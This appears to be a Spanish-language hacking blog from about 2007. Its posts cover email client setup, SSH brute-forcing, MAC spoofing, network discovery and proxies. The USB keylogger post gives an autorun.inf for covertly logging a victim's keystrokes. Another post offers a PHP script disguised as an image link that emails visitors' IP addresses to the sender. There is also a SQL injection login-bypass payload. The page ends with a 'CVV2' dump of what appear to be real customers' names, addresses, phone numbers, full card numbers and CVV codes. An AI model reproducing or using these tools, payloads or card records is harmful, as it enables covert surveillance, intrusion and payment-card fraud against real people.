| Mobile| RSS

Configurando un cliente de mail (Thunderbird)

http://icaix.com/front/wp-content/images/57.thumb.jpg

Te has parado a pensar alguna vez cuanto tiempo pierdes a diario accediendo a tus cuentas de email? Gracias a mozilla ThunderBird (o Icedove en Debian) podremos gestionar de una manera fácil, rapida y sencilla múltiples cuentas desde nuestro escritorio (aprox 2 min por cuenta).

Antes de mostraros como hacerlo, seria interesante que conocierais un poco los diferentes parámetros que nos iremos encontrando. Brevemente, voy a introduciros a aquellos conceptos basicos y necesarios con los que podréis configurar cualquier gestor de correo, no solo en Thunderbird, si no en cualquier otro.

Bien, lo primero que debemos entender es que solo hay dos cosas que podemos hacer con un email; Recibir y Enviar. Tiene sentido no? Ambos procesos son completamente independientes y por tanto habrá que configurarlos por separado.

Recepción emails

Cuando recibimos un email, normalmente hay un servidor de correo en alguna parte escuchando las 24 horas del día. Cuando recibe un mail, este es guardado hasta que usuario lo lee y decide cuando es el momento de eliminarlo.A día de hoy, la gestión del correo entrante se realiza normalmente con uno de los siguientes protocolos.

POP (Post Office Protocol), En este caso el servidor de correo es una zona de almacenamiento temporal para los emails entrantes. Una vez el usuario accede a su mail, este es transferido a su equipo, liberando el espacio ocupado en el servidor (su funcionamiento es similar al del buzón de correo en el sistema de correo tradicional).

Ventajas:

Minimo tiempo de conexión. Optimo para conexiones en las que se tarifa por minuto.
Mínimo uso de recursos de almacenamiento en el servidor (ya que una vez transferido se elimina)
Al estar el mail almacenado en tu equipo y podrás acceder a el sin necesidad de conectarte
Más extendido, y por tanto más software a su disposición.

Desventajas:

Solo se puede acceder al mail desde que el equipo desde el que te lo has descargado (malo si trabajas en varios equipos).
La mayoría de los servidores de correo que usan POP te permiten la opción de almacenar el mail en sus servidores, con el fin de evitar dicho problema. Ahora…, hay que tener cuidado a la hora de configurarlo si no quieres llevarte sorpresas.

IMAP (Internet Message Access Protocol), en vez de descargar los emails en el equipo del usuario, estos son guardados en el servidor, permitiendo al usuario acceder a el desde cualquier lugar de la red.

Ventajas:

Acceso desde múltiples equipo.
Descarga los emails solo cuando el usuario quiere leerlos (menor transferencia de datos)
Permite acceso “online”, “offline” o “disconnected”.

Si os dan la opción os recomiendo IMAP ya que los efectos de confundirse son menores.

Envió de mail

SMTP (Simple Mail Transfer Protocol). Solo tenemos una opción. Simplemente insertas el servidor de SMTP y listo. Por lo general con configurar un servidor de SMTP vale, sin embargo podremos configurar varios para posteriormente tener la opción de enviar mails desde diferentes “origenes”. Es servidor de SMTP se selecciona desde la pestaña “From” en la ventana de creación del mail.Dicho esto aquí os dejo los parametros de algunos de los servidores que os pueden interesar. Los que tengáis varias cuentas dentro de un mismo proveedor (véase gmail), no os preocupéis ya que podréis crear múltiples cuentas en paralelo.

Google Gmail

Tu Nombre: NombreQueQuierasQueSalgaEnElCampoFrom
Email Address: tuEmail@gmail.com
Tipo de Servidor de entrada: POP
Incoming Server: pop.gmail.com (SSL, puerto 995)
Outgoing Server: smtp.gmail.com (TLS, puerto 587)
Incoming User Name: tuEmail@gmail.com
Outgoing User Name: tuEmail@gmail.com

Guia oficial gmail. Aqui
Ver video tutorial icaix! Aqui

Upcomillas mail

Tu Nombre: NombreQueQuierasQueSalgaEnElCampoFrom
Email Address: tuEmail@alumnos.upcomillas.es
Tipo de Servidor de entrada: POP/IMAP
Incoming Server: alumnos.upcomillas.es (SSL, puerto 995, opcional)
Outgoing Server: alumnos.upcomillas.es
Incoming User Name: 200-XXX-XXX (numero de alumno)
Outgoing User Name: 200-XXX-XXX (numero de alumno)

Pagina de ayuda STIC Aquí.
Ver video tutorial icaix! Aqui

Microsoft Hotmail y Yahoo mail.

Este servicio, en principio, solo lo ofrecen a usuarios “Premium” y por tanto no esta disponible al público en general. Si que es cierto que hay plugins que permiten la descarga vía http.
Si hay interés, seguramente escriba una expansión de este “mini tutorial” mostrándoos como hacerlo.
Para los impacientes, Aquí os dejo un link a uno de esos plugins

Bueno, pues eso es todo. Realmente es mas sencillo de configurar de lo que parece. Yo ahora después de 6 meses usándolo me pregunto el porque no lo había probado antes. La verdad es ahorra mucho tiempo, te permite el control de varias cuentas simultáneamente, y lo mejor es que te avisa cuando recibes un nuevos emails. Os recomiendo que lo probéis ya que seguramente cambiara vuestros hábitos del uso del email.

sábado, 29 de septiembre de 2007 | Tags: | 0 comentario [ Mas... ]

Video Tutorial: Backtrack 2 | Remote brute force attack

Una de las responsabilidades de los administradores de sistemas es limitar el acceso a aquellos usuarios con autorización para entrar en el mismo. Con el fin de bloquear el acceso a terceros se crearon las contraseñas. Cada usuario posee un ‘nombre de usuario’ y una contraseña. Cada vez que un usuario quiere acceder al sistema se le piden dichos datos. Si el nombre de usuario y la contraseña coinciden con los almacenados en el servidor le permitimos el acceso, si no, se lo denegamos.

Uno de los problemas de este sistema surge cuando una tercera persona se hace pasar por uno de nuestros usuarios. Siempre y cuando conozca el nombre de usuario y su password se le permitirá el acceso, independientemente de que la persona no sea quien dice ser.

Otro problema es que si el acceso a sido denegado, el usuario puede volver a intentar acceso n numero de veces (normalmente n es infinito). Por lo general, limitar el número de intentos puede bloquearnos el acceso, haciendo del remedio peor que la enfermedad.

Un ataque muy común que se hace uso de dichas ‘vulnerabilidades’ son los ‘ataques basados en diccionarios’ (dictionary-based attack). El ataque consiste en bombardear al servidor con nombres de usuarios y contraseñas aleatorios. Es algo parecido a intentar abrir una caja fuerte introduciendo números al azar. Si alguna vez te has encargado de algún servidor ssh o ftp seguramente los hayas sufrido.

Ya que el número de posibles combinaciones de usuarios y passwords posibles es demasiado alto, en este tipo de ataque normalmente se usan diccionarios. Un diccionario (de passwords y/o usuarios) es un fichero de texto con nombres de usuario y passwords frecuentemente usados. Por ejemplo, en la mayor parte de sistemas nos solemos encontrar un usuario ‘root‘, y, estadísticamente hablando, passwords como ‘1234‘ o ‘qwerty‘ son usadas mas frecuentemente que ‘a\/gW1~3|23‘. Como te podrás imaginar, para diferentes idiomas se usan diferentes diccionarios.

Pero entonces…? SI!, La única manera de que este ataque funcione es que la combinación usuario-password este en tu diccionario, o en otras palabras, una mala gestión de usuarios/passwords.

El motivo por el que este tipo de ataques están tan extendidos es porque con un simple script podemos testear cientos o miles de servidores de forma automática sin necesidad de intervenir en el proceso. Otro motivo es que los ‘chicos malos’ necesitan ordenadores desde los que realizar sus ataques.

En un ataque real conseguir acceso al sistema es solo el primer paso. Una vez dentro se suele instalar como mínimo algún troyano con el cual garantizar el acceso en caso de que se cambie la password. Hay ocasiones en el que el atacante simplemente cambia la password para levantar sospecha y darle a conocer al usuario que su password es débil.

En este video tutorial os muestro un ejemplo práctico de cómo realizar este tipo de ataques y por supuesto como detectar su presencia.

Detalles técnicos

  • La distro usada para realizar el ataque es Backtrack 2, versión Live.
  • Para escanear la red y localizar posibles víctimas se uso nmap.
  • Para el ataque en si utilizamos medusa (~# man medusa).
  • El diccionario usado pertenece a ‘john the ripper‘ (Incluido por defecto en Backtrack 2).
  • El servidor de ssh en la víctima es una instalación estándar de OpenSSH.

Ver video tutorial

Video Tutorial: Backtrack 2 | Remote brute force attack

Pulsa aquí o sobre la imagen para acceder al vídeo tutorial.

Detección y prevención

La mejor forma de detectar este y cualquier tipo de ataque es comprobando los logs y analizando cualquier anomalía. En su día escribí un post llamado ‘Navegando entre los logs’ donde hable de cómo el servidor en el que se encuentra alojado esta web, Fujiyama, estaba en constante estado de alerta.

En ‘Consejos básicos: Mantener un servidor del ssh’ menciono las practicas mas habituales para evitar este tipo de ataques sobre servidores de ssh. En esa época decidí cambiar el puerto de escucha del servidor de ssh y desde entonces no he recibido ningún ataque en los dos últimos meses.

Todo NIC (Network Interface Controller)

Todo NIC (Network Interface Controller) posee un identificador de 48 bits al que normalmente nos referimos como MAC. Dicho identificador es asignado por el fabricante de la tarjeta, y teoricamente es “único” para cada NIC, y . Dichos 48 bits se suelen representan en hexadecimal (16 grupos de 4 bits).

Como dato interesante, antes de poder asignar una MAC, los productores de Interfaces de red han de acordar (pagando una licencia) con el IEEE el rango de MACs en el que pueden trabajar. Gracias a esta jerarquía, analizando parte de la MAC podemos averiguar quien es el fabricante.

Normalmente el id del fabricante son los primeros 24 bits. Imaginemos que tu MAC es AA-AA-AA-BB-BB-BB, “AA-AA-AA” seria el código de fabricante y “BB-BB-BB” el numero asignado por dicho fabricante. Es por esto que muchas aplicaciones son capaces de “averiguar” el fabricante de la tarjeta (Compaq, intell, etc).

Ver MAC en Windows:

Windows trata a dicha dirección como “Physical Address” o dirección física. Para verla basta con que teclees en la consola del sistema “ipconfig /all”.

> ipconfig /all

Ethernet adapter Local Area Connection:

Sufijo de conexión específica DNS . :
Descripción . . . . . . . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet
Dirección física. . . . . . . . . . . . . : 00-E0-7E-11-22-33
DHCP habilitado. . . . . . . . . . . . . . . . : No
Dirección IP. . . . . . . . . . . . . . . . . . . . : 192.168.1.10
Máscara de subred. . . . . . . . . . . . . . : 255.255.0.0
Puerta de enlace predeterminada . : 192.168.1.1
Servidores DNS. . . . . . . . . . . . . . . . . :

Ver MAC en Linux:

Linux por otro lado la llama “Haddr”, Hardware address. Para verla basta con pulsar “sudo ifconfig” o en la terminal.

#sudo ifconfig

eth0 Link encap:Ethernet HWaddr 00:0B:DB:C6:2E:5C
inet addr:150.203.233.126 Bcast:150.203.233.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7002 errors:0 dropped:0 overruns:0 frame:0
TX packets:749 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:1861755 (1.7 MiB) TX bytes:141647 (138.3 KiB)
Base address:0xdf40 Memory:feae0000-feb00000

“universally administered address” vslocally administered address”

Entonces…, es posible o no cambiar dicho identificador?. En linux Si. En windows normalmente tambien, aunque depende de los drivers.

Hasta ahora implicitamente nos estabamos refiriendo a la “universally administered address”. Dicho código esta grabado “Hard Coded” en la tarjeta y como proras imaginar NO se puede modificar. Sin embargo, con el fin de dar cierta flexibilidad a los administradores de redes se decidió crear la llamada “locally administered address“ la cual se mantiene via software, y SI que la podemos personalizar.

En el momento que asignemos algún valor a la segunda, la tarjeta comenzará a usar dicho valor. Este truco es muy útil para evitar filtros de MAC o suplantar otros equipos.

Cambiar la MAC en Windows:

Inicio -> Panel del Control -> Conexiones de red -> Conexión de red local -> (botón derecho) propiedades:

MAC1

-> Configuracion -> (Pestana)Avanzado:

MAC2

-> Selecciona “Locally Administered Address” e introduce la nueva MAC -> Aceptar -> Aceptar.

Cambiar la MAC en Linux:

# sudo ifconfig eth0 hw ether AA:AA:AA:BB:BB:BB

Opciones:
eth0 -> Interfaz de la tarjeta que quieras cambiar.
AA:AA:AA:BB:BB:BB -> Nueva MAC.

Por ultimo, Aquí os dejo una lista (gracias a ettercap) bastante completa de los rangos asignados a los diferentes productores de tarjetas.

Netdiscover, analizando la red.

http://nixgeneration.com/~jaime/netdiscover/

Anoche saliste de fiesta, la ocasión se lo merecía, habías construido tu primer USB-KeyLogger. Desgraciadamente, se te fue un poco la mano con el alcohol y hoy te levantas en un lugar en el que nunca antes habías estado… Seguramente, lo primero que harás una vez levantado es mirar a tu alrededor y observar el entorno. Buscar elementos que te resulten familiares que te sirvan para hacerte una idea de donde estas y contra que es lo que te enfrentas.

No!, no me he vuelto loco. Sin embargo la situación es similar a cuando conectas tu ordenador a una red desconocida (ya sea por cable o Wireless). Inicialmente, si tienes suerte, habrá un servidor de DHCP que te proveerá de la mínima información necesaria para poder hacer uso de la red; una ip, una mascara de red y una puerta de enlace. Sin embargo nosotros queremos saber un poco mas sobre los aquello que nos rodea. Porque?, imagínate por ejemplo que alguien esta haciendo un mitm (man in the middle attack) con ettercap

Pues bien, hoy os presento netdiscover. Haciendo uso del ARP (Address resolution protocol), Netdiscover localizará todos los equipos de la red devolviéndonos una relación entra la ip local y la MAC de cada equipo.

Los que creyeseis (yo mismo hace una semana) que con broadcast un ping (ICMP echo request) es suficiente estáis equivocados. En muchas ocasiones os encontrareis que la función ping esta deshabilitada (por motivos de seguridad).

Esta es la pagina oficial de netdiscover. También es posible que os podáis hacer con el a través de alguno de los repositorios de tu distro.

Una vez instalado es bueno leerse el manual (man netdiscover). A groso modo estas son algunas de las opciones disponibles

Opciones Principales:

-i dispositivo: interfaz de red que quieres usar; eth0, eth1, wlan.

-r rango: rango que de deseas escanear. Ex: 192.168.1.0/24 escaneara todas las ips entre 192.168.1.0 y 192.168.1.255.

-p: modo pasivo. No infectará nada, solo escucha las peticiones ARP que lleguen a nuestro equipo (eficaz pero mas lento).

-s time: tiempo en milisegundos entre peticiones ARP. Útil si no quieres saturar la red o no quieres ser detectado por algún IDS.

-f: fast mode.

Ejemplos de Uso:

  • Búsqueda de direcciones comunes en eth0

# netdiscover -i eth0

  • Búsqueda en modo rápido de direcciones comunes en eth0 (solo la puerta de enlace)

# netdiscover -i eth0 -f

  • Ejemplo de análisis de algunos rangos

# netdiscover -i eth0 172.26.0.0/24
# netdiscover -i eth0 192.168.0.0/16
# netdiscover -i eth0 10.0.0.0/8

  • Idem que el primer ejemplo pero con un intervalo de 0.5ms (1ms por defecto)

# netdiscover -i eth0 -s 0.5

  • Búsqueda pasiva. Solo analiza el trafico entrante. No infectará nada a la red.

# netdiscover -i eth0 -p

Conclusion:

Personalmente estoy encantado con esta sencilla aplicacion. Obviamente netdiscover no tiene la potencia de otras aplicaciones como nmap, pero sin embargo “lo que hace lo hace bien” de una manera rápida y sencilla. Puede resultar muy útil en las primeras etapas del análisis de una red.

Tutorial: USB KeyLogger

Hoy nos olvidamos de cables, backdoors, ARP Poisoning, ettercap, sniffers y todo aquello que tenga que ver con redes.

Mucha gente cree que con proteger su equipo contra ataques atraves de la red con firewalls y antiviruses, el ordenador ya es seguro e impenetrable. Sin embargo, ¿que pasa cuando el atacante tiene acceso físico a la maquina? ¿Es realmente peligroso?

Para demostrar el potencial de este tipo de ataques, hoy vamos a crear nuestro propio USB-Keylogger. Un “pendrive” que al conectarlo a nuestro querido Windows, guardara todo aquello que tecleemos sin que, por supuesto el usuario “victima” se entere.

Bueno…, miento, en realidad este metodo tiene truco, ya que para hacerlo funcionar windows tiene que tener habilitada el mecanismo de autoarranque. Es decir, cuando insertemos el pendrive, windows debera ejecutar el archivo autorun.inf. Sin embargo, por lo general no es problema ya que windows tiene dicha opcion activada por defecto.

Requisitos:

  1. Maquina con Windows (probado en XP SP2)
  2. Un Pendrive (de con al menos 15 MB)

Instalación:

  1. Descárgate este archivo y descomprímelo en el directorio raíz del Pendrive.

Ataque:

  1. Conectar el USB a la maquina.
  2. Seleccionar la primera opción en el menú de Auto arranque “Iniciar Keylogger”.
  3. Una vez arrancado el Keylogger pulsa F12 para acceder al los menus (opcional).

Al pulsar “Aceptar” veras que hay un nuevo proceso llamado keylogger.exe, este es el encargado de registrar todas las teclas pulsaciones realizadas sobre el teclado.

Acceso a los Logs:

  1. Los logs se irán almacenando en la carpeta “logdir”.
  2. Usa tu editor de texto favorito para acceder a ellos.

Como Funciona:

Cuando conectamos un medio extraíble a nuestro sistema (CDs, DVDs, Pendrives, etc), Windows nos permite incluir un archivo “Autorun.inf” en el que podemos definir el comportamiento del medio, ex;dar nombre a la unidad, asignarle iconos especiales o lanzar aplicaciones. Asi es como Juegos, CDs de Música e Instaladores nos sorprenden con sus encantadores menús cada vez que los insertamos en el ordenador.

Desde Autorun.inf podemos ejecutar cualquier aplicación, lo único que debemos de conocer es su ubicación, en este ejemplo un keylogger, pero perfectamente podría ser reemplazado por un ladrón de passwords, virus, troyanos, o lo que se nos ocurra.

En este ejemplo solo usaremos los comandos mas basico:

label: Asigna el nombre de la unidad.
icon: ubicacion del icono que se asignara a la unidad.
action: Texto que se mostrara como opcion por defecto en el menu de autoarranque.
shellexecute: Aplicacion que ejecutar.

Autorun.inf

[Autorun]
label=Icaix.com
icon=”icaix.ico”
action=Iniciar Keylogger
shellexecute= “Keylogger.exe”

Keylogger

El keylogger usado se llama PyKeylogger. Esta es la pagina oficial. Os recomiendo que le echéis un ojo, es open source con licencia GPL.
El binario del ejemplo no es exactamente el de la página oficial. Para eliminar el pop up inicial y hacer el ataque más real he modificado la línea 114 del archivo “keylogger.pyw”. Aquí una copia.

Prevención:

La forma de evitar este tipo de ataques es deshabilitar la opcion de autoarranque de windows. Aquí os dejo un link de cómo hacerlo.

Como obtener la Ip de nuestros amigos del msn

Seguramente alguna vez se has necesitado/querido tener acceso a las ip de algunos de tus contactos de Messenger. Hasta ahora, la única manera que, por lo menos yo, conocia para obtenerla era mandándoles un archivo y capturar la ip durante la transmisión. Aunque dicho método funciona, no es demasiado práctico.

Hoy navegando por Internet me he cruzado con Profit42.com. Profit42.com es una especie de blog/comunidad donde entre otros temas hablan de cosas de seguridad y tienen colgados unos cuantos tutoriales. Uno de ellos es sobre el que voy a hablar ahora (Fuente original).

El objetivo consiste en que la victima pulse sobre un link, aparentemente inofensivo, que automáticamente nos mandara un email su ip. Realmente, dicho link no es mas que una pequeña pagina en php, que automáticamente envía un mail con la ip de todo aquel que acceda a el. El unico requesito es tener acceso a un dominio con soporte para php.

Ejemplo:

Creemos una carpeta llamada foto.jpg
En dicha carpeta guardaremos una imagen (http://LoQueSea.com/foto.jpg/foto.jpg) y crearemos un documento “index.php” (http://LoQueSea.com/foto.jpg/index.php) con el siguiente codigo:

$remote_addr = getenv(’REMOTE_ADDR’);
$toaddress = “tuMail@mail.com”; // tu email!
$subject = “Asunto”; // asunto del email
$message = ” IP: $remote_addr”; // Cuerpo del mail
$fromname = “CapturaIp”; // Quien lo envía
$fromaddress = “loQueTeDeLaGana@LoQueSea.com”; // Email de quien lo envía
$headers = “MIME-Version: 1.0\n”;
$headers .= “Content-type: text/plain; charset=iso-8859-1\n”;
$headers .= “X-Priority: 3\n”;
$headers .= “X-MSMail-Priority: Normal\n”;
$headers .= “X-Mailer: php\n”;
$headers .= “From: \”".$fromname.”\” <”.$fromaddress.”>\n”;
mail($toaddress, $subject, $message, $headers);
?>

Cuando alguien acceda a Index.php:

  1. Mandara la ip a tuMail@mail.com
  2. Mostrara foto.jpg

Aqui un ejemplo del resultado: http://icaix.com/gracioso.jpg
Descargatelo desde Aqui

Como ejecutar el ataque?

Simplemente mándales a tus amigos un link a http://dominoConSoportePhp.com/foto.jpg y listo, recibirás un mail segundos mas tarde con su ip.

SQL injection”

Supongo que la mayoría de vosotros conocereis lo que un “SQL injection attack” es. Para los que no, “SQL injection” consiste en la inserción código SQL en las variables del programa que estés ejecutando. Si tienes suerte, el programa insertara dichas variables dentro de la “query” y podremos realizar el ataque.

Por ejemplo, imaginémonos el tipo formulario de acceso a un sistema. Este tiene dos campos, cuyas variables son “$nombreUsuario” y “$password”.

Una forma de comprobar si dicho usuario existe seria con la siguiente “query”

SELECT *
FROM tablaUsuarios
WHERE (userId = ‘$nombreUsuario’) AND (pass = ‘$password’);

Donde:

  • tablaUsuarios -> tabla que contiene los usuarios
  • userId -> campo de la tabla que contiene los nombre de usario
  • pass -> campo de la tabla que contiene las passwords.

Si la query devuelve algún resultado entonces le damos acceso al usuario.
Bien, imaginémonos que como nombre de usuario introdujésemos lo siguiente;

  • $nombreUsuario = pepito’ OR ‘x’=’x
  • $password = nose’ OR ‘y’=’y

La query resultante seria la siguiente:

SELECT *
FROM tablaUsuarios
WHERE (userId = ‘pepito’ OR ‘x’=’x’) AND (pass = ‘nose’ OR ‘y’=’y’);

Como veis, la cláusula WHERE será siempre cierta y por tanto es muy probable que consigamos acceso al sistema (seguramente con el primer miembro de la lista).

La verdad es que es una pena que rara vez se hable del tema en entornos educativos, ya que existen formas de evitar dichas vulnerabilidades, y un correcto acceso a la información es básico. Muchas son las empresas que han sufrido de dichos ataques, y aun así, poco lo que se esta haciendo para advertir a las futuras generaciones de ingenieros y programadores.

No voy a entrar en mayor detalle en este tema ya que esta extensamente documentado en la red y con google podréis encontrar cientos de ejemplos, así como de soluciones o guías de prevención para evitar posibles ataques.

Sin embargo un video que si que os recomiendo ver es este.

TUTORIAL: Proxies

TUTORIAL: Proxies

by Miggs

Introduccion

Recientemente, un amigo que esta muy Jodido (Fucked), me pidió que le explicara que son eso de los “proxies”, para que sirven, y como se usan. Así que bueno, en este tutorial intento explicar de una manera simple que es eso de los proxies. En particular voy a centrarme en HTTP Proxies ya que estos son los mas extendidos. Hoy no, pero a lo mejor en algun futuro cercano explicare como configurar SQUID.

Este tutorial esta basado en el uso proxies públicos. En el caso de que desconozcas a los admins de dichos proxies, por favor, tener cuidado!:
UN PROXY PUEDE FILTRAR Y ANALIZAR TODO EL TRAFICO QUE PASE ATRAVES DE EL. Por eso, no recomiendo que introduzcáis passwords ni información delicada mientras los uséis.

Que es un HTTP Proxy?

Un HTTP proxy no es mas un servidor que se interpone entre todas las conexiones HTTP (puerto 80 por defecto) tuyas y cualquier otro servidor. Es decir, si quieres conectarte a icaix.com desde tu casa. Tu ordenador se conectara primero al proxy, y sera el proxy el que posteriormente se conecte a icaix.com, canalizando todo el tráfico entre tu ordenador e icaix de una forma transparente para ti.

Tipos de HTTP_Proxy!

Bien, antes de seguir es importante que diferenciemos los diferentes tipos de HTTP proxies que nos podemos encontrar, ya que segun el tipo de proxy que usemos estaremos mandando mas o menos datos a los servidores a los que nos conectemos. NO todos los proxys mantienen la anoimidad del cliente, así que es importante saber que es lo que pueden llegar a saber de nosotros.

  • Proxy transparente: Como su nombre indica, es transparente, es decir, el proxy comunica al servidor que efectivamente se esta usando un proxy, pero…, inmediatamente después le da a conocer la ip del cliente. El uso de este tipo de proxies es canalizar el trafico de múltiples estaciones, con el fin de analizar el trafico, y posiblemente bloquear determinadas ips (ex: youTube.com), o limitar en ancho de banda de las estaciones.
  • Proxy Anónimo: Indican a los servidores que se esta usando un proxy, pero no le da a conocer la ip del cliente.
  • High anonymity: Proxy: Este es el que mas me gusta, y el que mas util si quieres esconder tu ip. El proxy se encarga como su nombre indica de proteger tu anonimidad. El proxy se conecta al servidor en cuestión haciéndole creer que el es el cliente. NO avisa que se este usando un proxy.

Existen otros tipos de HTTP Proxies, pero son poco utilizados así que ignoraremos su existencia (por ahora).

Porque “HTTP Proxy” y no “Proxy” a secas?

Como seguramente seras capaz de intuir, los HTTP proxies solo trabajan con conexiones HTTP.

Porque HTTP exclusivamente y no cualquier servicio como FTP, TELNET?.

HTTP es un Protocolo. Por tanto que el servidor Proxy tiene que ser capaz de trabajar con los campos de las tramas que le enviamos. Si en algún caso le enviásemos tramas de cualquier otro protocolo, por ejemplo TELNET, el servidor no las entenderá y las ignorara.

Entonces…, Porque mi cliente de FTP tiene la opción de usar el dichoso Proxy?

Lo que esta pasando ahí, es que el cliente de FTP esta encapsulando las tramas FTP dentro de paquetes HTTP. El PROXY que es muy listo desencapsulara y enviara al servidor de ftp tramas en formato FTP.Ojo, no todos los proxies soportan este tipo de servicio.

Vale, Vale, cállate ya, me mola!, como se usan?!

La configuración de proxies normalmente se especifica a nivel de aplicación. Normalmente, en principio no afecta al entorno de red del del OS, funcionando de forma independiente en cada una de las aplicaciones. Es decir, puedes tener firefox configurado para que use determinado proxy, mientras que Opera, o el msn usen otro o ninguno. Hoy os voy a enseñar como configurarlo en ambos, Firefox, e IE.

Como bien he dicho arriba Normalmente no afecta al variables de red del OS, sin embargo, los chicos de Microsoft decidieron implementar IE de tal forma que en vez de tener sus propios parámetros como hacen Firefox o Opera, IE hará uso de las variables del sistema, es decir, al configurar un proxy en IE estaremos actualizando el entorno de red de Windows, extendiendo el uso de dicho proxy al resto de aplicaciones que utilicen en este caso HTTP.

Lo primero es conseguir un proxy. En internet hay paginas que se dedican unica y exclusivamente a publicar direcciones de Proxies publicos. Si no tienes un poxy a mano, y no te apetece montarte uno en tu propio ordenador, esta es la mejor solución. La pagina mas completa que conozco es: http://www.publicproxyservers.com/ Ahí encontrareis multitud de proxies (aunque muchos de ellos no funcionan).

Una vez encontréis un proxy que os guste, notareis que hay varios parámetros dentro de cada proxy. Los mas importantes son la ip y el puerto de escucha ( y el tipo de proxy por supuesto):

IP: es la ip única que identifica al servidor, y es con lo que localizamos el servidor

Puerto: es el puerto de escucha dentro del servidor. Por ejemplo los puertos 3128 y 8080 son los que usan la mayor parte de los proxies. EL PUERTO DE ESCUCHA NO TIENE PORQUE SER 80!!!!. El puerto 80 es normalmente usado para servidores Web HTTP (ex: Apache o IIS), lo cual es un servicio completamente diferente al de un proxy. Los proxies normalmente escuchan en otros puertos. Es mas…, mi consejo es evitar los proxies que escuchen por el puerto 80 ya que lo mas seguro es que se dediquen a analizar trafico.

Tipo de proxy: explicado mas arriba.

En este ejemplo usaremos el siguiente proxy ficticio:

Configuración en Firefox 1.5

Configuración en IE 6:

INSISTO: La configuración de IE modifica los parámetros de conexiones de red del sistema. Cualquier aplicación que haga uso de dichos parámetros usara dicho proxy.

Como comprobar que efectivamente estoy a través de un proxy?

Lo mas sencillo es comprobar a través de www.showmyip.com tu ip antes y después de configurar el proxy.

Como deshabilito el proxy?

Muy sencillo, lo único que tienes que hacer es deshabilitar la opción de uso de proxy y tu trafico recuperara la ruta por defecto (conexión directa a Internet). La nueva configuración se aplicara a todas las conexiones creadas a partir de dicho momento.

Vale, quiero saber mas! Donde sigo….

Mi recomendacion para profundizar en el tema es google por supuesto. Hay multitud de proxies open source con los que poder jugar. Mi favorito (el que uso) es Squid.

CVV2

1089933832|Richard Tudor|214 Beechwood Drive|Roanoke Rapids|NC|27870|USA|Richard Tudor|214 Beechwood Drive|Roanoke Rapids|NC|27870|USA|252-537-1781||tudor@schoollink.net|Visa||4275571006591945|3/2005|Ground Shipping|
CVV2 NUMBER: 248 |1|0.00|Whirlpool|42.23|WHO-279838||42.23|101|42.23|42.23| 7.00| 3.45| 52.68 1090259936|Charles Dobbins|1939 Harper Road|Beckley|WV|25801|USA|Charles Dobbins|1939 Harper Road|Beckley|WV|25801|USA|304-252-0671||bwfourseasonsinn@charter.net|Visa||4802132159992539|3/2006|Ground Shipping|
CVV2 NUMBER: 964 |6|0.00|Friedrich A C|1.25|FRO-61493903||1.25|101|7.5|7.5| 7.00|0.00| 14.50 1090685610|ruben tirado|20 Pickens lane|weaverville|nc|28787|us|ruben tirado|20 Pickens lane|weaverville|nc|28787|us|828-777-5775|828-645-8457|judyglick2@aol|Visa||4802132364541535|7/2005|Ground Shipping|
CVV2 NUMBER: 633 |1|0.00|Misc Refrig|14.70|YMO-RM292-1||14.70|101|14.7|14.7| 7.00| 1.52| 23.22 1093189045|Jeffery Almoney|1255 Oak Ridge Avenue|State College|PA|16801|USA|Jeffery Almoney|1255 Oak Ridge Avenue|State College|PA|16801|USA|8142344071|8148676816|jalmoney@aol.com|American Express||371380337234006|8/2005|Ground Shipping|Thank you!
CVV2 NUMBER: 9929 |2|0.00|General Electric|3.96|GEO-WB31X5014||3.96|103|7.92|61.84| 7.00|0.00| 68.84 1093189045|Jeffery Almoney|1255 Oak Ridge Avenue|State College|PA|16801|USA|Jeffery Almoney|1255 Oak Ridge Avenue|State College|PA|16801|USA|8142344071|8148676816|jalmoney@aol.com|American Express||371380337234006|8/2005|Ground Shipping|Thank you!
CVV2 NUMBER: 9929 |2|0.00|General Electric|3.75|GEO-WB31X5013||3.75|102|7.5|61.84| 7.00|0.00| 68.84 1093189045|Jeffery Almoney|1255 Oak Ridge Avenue|State College|PA|16801|USA|Jeffery Almoney|1255 Oak Ridge Avenue|State College|PA|16801|USA|8142344071|8148676816|jalmoney@aol.com|American Express||371380337234006|8/2005|Ground Shipping|Thank you!
CVV2 NUMBER: 9929 |2|0.00|General Electric|13.53|GEO-WB32X5060||13.53|104|27.06|61.84| 7.00|0.00| 68.84 1093189045|Jeffery Almoney|1255 Oak Ridge Avenue|State College|PA|16801|USA|Jeffery Almoney|1255 Oak Ridge Avenue|State College|PA|16801|USA|8142344071|8148676816|jalmoney@aol.com|American Express||371380337234006|8/2005|Ground Shipping|Thank you!
CVV2 NUMBER: 9929 |2|0.00|General Electric|9.68|GEO-WB32X5059||9.68|101|19.36|61.84| 7.00|0.00| 68.84 1093977053|Donald Buchanan|265 Dogwood Lane|Marion|NC|28752||Donald Buchanan|265 Dogwood Lane|Marion|NC|28752||828-659-5687||drb11@charter.net|American Express||373274754001006|2/2005|Ground Shipping|
CVV2 NUMBER: 9531 |1|0.00|Maytag|59.49|MAO-303404||59.49|101|59.49|59.49| 7.00| 4.65| 71.14 1094414715|Pete Yu|6916 Elk Canyon Road|Oklahoma City|OK|73162|U S A|Pete Yu|6916 Elk Canyon Road|Oklahoma City|OK|73162|U S A|405 722-3389||py6669@hotmail.com|American Express||373988914352005|7/2006|Ground Shipping|
CVV2 NUMBER: 9541 |1|0.00|General Electric|49.94|GEO-WR60X10074||49.94|101|49.94|49.94| 7.00|0.00| 56.94 1094562550|KENDRO LABORATORY PRODUC|275 AIKEN ROAD|ASHEVILLE|NC|28804|US|KENDRO LABORATORY PRODUC|275 AIKEN ROAD|ASHEVILLE|NC|28804|US|8286584493|8286453981|amy.gahagan@kendro.spx.com|ACCOUNT|||/|UPS Ground|
PURCHASE ORDER NUMBER: 401906
CUSTOMER NUMBER: 45367000 |1|0.00|General Electric|4.20|GEO-WR14X419|6.16|4.20|102|4.2|93.59| 9.36|0.00| 102.95 1094562550|KENDRO LABORATORY PRODUC|275 AIKEN ROAD|ASHEVILLE|NC|28804|US|KENDRO LABORATORY PRODUC|275 AIKEN ROAD|ASHEVILLE|NC|28804|US|8286584493|8286453981|amy.gahagan@kendro.spx.com|ACCOUNT|||/|UPS Ground|
PURCHASE ORDER NUMBER: 401906
